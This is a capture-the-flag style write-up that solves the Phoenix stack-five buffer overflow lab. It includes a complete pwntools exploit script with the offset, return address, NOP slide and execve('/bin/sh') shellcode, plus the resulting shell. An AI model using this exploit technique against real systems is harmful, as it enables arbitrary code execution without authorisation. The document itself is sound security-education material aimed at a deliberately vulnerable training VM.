Simple 64-bit buffer overflow with shellcode

Introduction

Buffer overflow is a common vulnerability that has plagued software systems for years. It occurs when a program attempts to store data beyond the bounds of a buffer, causing the extra data to overwrite adjacent memory locations. This can lead to a variety of problems, including crashes, security breaches, and even the execution of malicious code. One of the most powerful ways to exploit a buffer overflow is by injecting shellcode into the overflowed buffer, which allows an attacker to take control of the program and execute arbitrary commands. In this blog post, we will explore the basics of buffer overflow attacks and demonstrate how to execute shellcode by solving Stack 5 from Pheonix.

Summary

This level from Pheonix is a simple 64-bit buffer overflow that requires us to overflow the buffer and overwrite the return pointer to return to some shellcode that we have placed on the stack.

Binary analysis

One of the first things I do when I have a binary is run file on it

$ file ./stack-five

./stack-five: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /opt/phoenix/x86_64-linux-musl/lib/ld-musl-x86_64.so.1, not stripped

From this output we now know that we are working with a 64-bit binary and we also know that it is dynamically linked and is not stripped of the debug symbols, which makes reverse engineering it much easier if we had to.

Source code

Since we are provided with the source code we won’t have to do any disassemling or reverse engineering to figure out how this binary works

/*
 * phoenix/stack-five, by https://exploit.education
 *
 * Can you execve("/bin/sh", ...) ?
 *
 * What is green and goes to summer camp? A brussel scout.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void start_level() {
  char buffer[128];
  gets(buffer);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}

In the comments, we are given a hint that we need to run execve("/bin/sh"), but there is no execve() function being ran anywhere in the source code. And if we check the security measure applied using checksec from pwntools:

$ checksec ./stack-five

[*] '/opt/phoenix/amd64/stack-five'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
    RPATH:    '/opt/phoenix/x86_64-linux-musl/lib'

We see that NX (No execute from stack) is disabled, as well as all the other security measures. So now it is very obvious that we are going to need to inject our own shellcode.

Starting with the main function, it simply prints the banner then calls start_level() which defines a 128 byte buffer and then uses gets() (the dangerous C function) to get user input and stores it in the 128 byte buffer without any checks for the length of the user supplied input whatsoever.

Running

Now that we know what it does, we can run it

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-five
Welcome to phoenix/stack-five, brought to you by https://exploit.education
hello

As we saw in the source it just takes input and exits.

Now let’s see what happens when we give it a big input

user@phoenix-amd64:/opt/phoenix/amd64$ python3 -c "print('A' * 200)" | ./stack-five
Welcome to phoenix/stack-five, brought to you by https://exploit.education
Segmentation fault

A segmentation fault! that means accessed parts of the memory we weren’t supposed to.

Finding offset

To find the offset I will open the program in GDB and I am using GEF because it comes with useful tools to help with exploit development. GEF also comes pre-installed on the Pheonix machine.

gef➤  pattern create 200
[+] Generating a pattern of 200 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
[+] Saved as '$_gef0'
gef➤

Using the pattern create command in GEF we can create a pattern that is unique for every 8 bytes, which will make it easy to find.

Now we can run the program again and supply this pattern and we find which of the unique 8 bytes from the pattern ended up in rip.

gef➤  r
Starting program: /opt/phoenix/amd64/stack-five
Welcome to phoenix/stack-five, brought to you by https://exploit.education
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

Program received signal SIGSEGV, Segmentation fault.

The program crashes as expected and GEF has hooks set up to print the registers, stack and instructions.

Looking through the resgisters output we see:

$rip   : 0x6161616161616172 ("raaaaaaa"?)

The instruction pointer was overwritten with raaaaaaa meaning whatever we place instead of that will be our new rip.

Now we use pattern search to find where that is in the pattern string

gef➤  pattern search 0x6161616161616172
[+] Searching '0x6161616161616172'
[+] Found at offset 136 (little-endian search) likely
[+] Found at offset 129 (big-endian search)
gef➤

From the binary analysis we know that this binary is little endian so now we know that the offset is 136

Crafting exploit

We can now start working on the exploit

#!/usr/bin/env python3

from pwn import *

# Defining binary
bin = context.binary = ELF('./stack-five', checksec=False)
p = process(bin.path)
context.update(arch="amd64")

# The offset and padding we need to overflow the buffer
OFFSET  = 136
PADDING = b'A' * OFFSET

I am using the pwntools library and I create a an ELF binary object, start the proccess which will open the program to interact with with it and I set the architecture.

Payload

Currently our exploit will take us to the address where it will overwrite rip and then just go into the stack. So first part of our payload will be the address to write into rip and then we are going to need a nop slide to make sure we hit our shellcode and then finally, our shellcode.

When performing a buffer overflow attack, a NOP slide can help an attacker hit their shellcode by creating a region of uncertainty about the exact location of the code. By inserting a large block of NOP instructions in between the code and the shellcode, an attacker can increase the chances of their shellcode being executed, even if they do not know the exact location of the code they are trying to overwrite. - ChatGPT

Step 1 - Find stack address

I want to make sure I have the stack address at the point where the main function would return.

We can do that by first adding a breakpoint at the return instruction of main() in GDB.

To see the addresses of the instructions we can disassemble the function:

gef➤  disas main
Dump of assembler code for function main:
   0x00000000004005a4 <+0>:	push   rbp
   0x00000000004005a5 <+1>:	mov    rbp,rsp
   0x00000000004005a8 <+4>:	sub    rsp,0x10
   0x00000000004005ac <+8>:	mov    DWORD PTR [rbp-0x4],edi
   0x00000000004005af <+11>:	mov    QWORD PTR [rbp-0x10],rsi
   0x00000000004005b3 <+15>:	mov    edi,0x400620
   0x00000000004005b8 <+20>:	call   0x400400 <puts@plt>
   0x00000000004005bd <+25>:	mov    eax,0x0
   0x00000000004005c2 <+30>:	call   0x40058d <start_level>
   0x00000000004005c7 <+35>:	mov    eax,0x0
   0x00000000004005cc <+40>:	leave
   0x00000000004005cd <+41>:	ret
End of assembler dump.
gef➤  b *0x4005cd
Breakpoint 1 at 0x4005cd
gef➤

The address we are interested in is the last one (ret) which is 0x4005cd we don’t need to grab the extra 0s because pwntools knows it is a 64-bit program and will treat it accordingly.

Now we run program normally with normal input and it stops at the breakpoint.

From here we use info registers to look at the registers

gef➤  info registers
...
...
rsp            0x7fffffffebe8      0x7fffffffebe8
...
...
gef➤

This address is the stack address. We can now update that in the exploit.

rip = p64(0x7fffffffebe8 + 40) # new rip -> rsp

Notice I am also adding + 40 to the address just to make sure we hit our nop slide.

Step 2 - nop slide

This part is pretty simple. The opcode of a nop instruction is 0x90. We use that as a raw byte in the code as \x90

nop_slide = b'\x90' * 100

Part 3 - Shellcode

For this part we can find shellcode to execute exevce("/bin/sh") for an amd64 linux system online. But I am going to use shellcraft from the pwntools library to generate the shellcode.

shellcode = asm(shellcraft.linux.sh())

I did not have to specify architecture becuase I set the context at the start of the script.

The output of that line will be be the raw shellcode bytes resturned by asm(). The output of shellcraft.linux.sh() is the assembly code for executing execve("/bin/sh").

Exploiting

Now that we have the payload set up, the final exploit will be:

#!/usr/bin/env python3

from pwn import *

# Defining binary
exe = context.binary = ELF('./stack-five', checksec=False)
p = process(exe.path)
context.update(arch="amd64")

# The offset and padding we need to overflow the buffer
OFFSET  = 136
PADDING = b'A' * OFFSET

# Building payload
rip = p64(0x7fffffffebe8 + 40) # new rip -> rsp
nop_slide = b'\x90' * 100
shellcode = asm(shellcraft.linux.sh()) # Output from shellcraft will be the assembly code below. using asm() to compile it into raw bytes

'''
Shellcode in assembly:
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    mov rax, 0x732f2f2f6e69622f
    push rax
    mov rdi, rsp
    /* push argument array ['sh\x00'] */
    /* push b'sh\x00' */
    push 0x1010101 ^ 0x6873
    xor dword ptr [rsp], 0x1010101
    xor esi, esi /* 0 */
    push rsi /* null terminate */
    push 8
    pop rsi
    add rsi, rsp
    push rsi /* 'sh\x00' */
    mov rsi, rsp
    xor edx, edx /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
'''

# Finally, putting them together into one payload
payload = PADDING + rip + nop_slide + shellcode

# Sending the payload
p.sendlineafter(b'education\n', payload)

# Going into interactive mode to interact with new shell
p.interactive()

We send the payload to the process we opened with p.sendlineafter() to send the payload right after the banner is printed.

Then we go into interactive mode to input commands into the new /bin/sh process.

user@phoenix-amd64:/opt/phoenix/amd64$ ./solve_stack-five.py
[+] Starting local process '/opt/phoenix/amd64/stack-five': pid 1219
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)

Success!

Mitigation

This exploit would not have been possible if Address space layout randomization (ASLR) was enabled on this machine and the program was compiled with the NX bit enabled which disables any code execution from the stack. Since this is a VM made for exploit education, those mitigations were turned off but in a real world scenario they should always be enabled.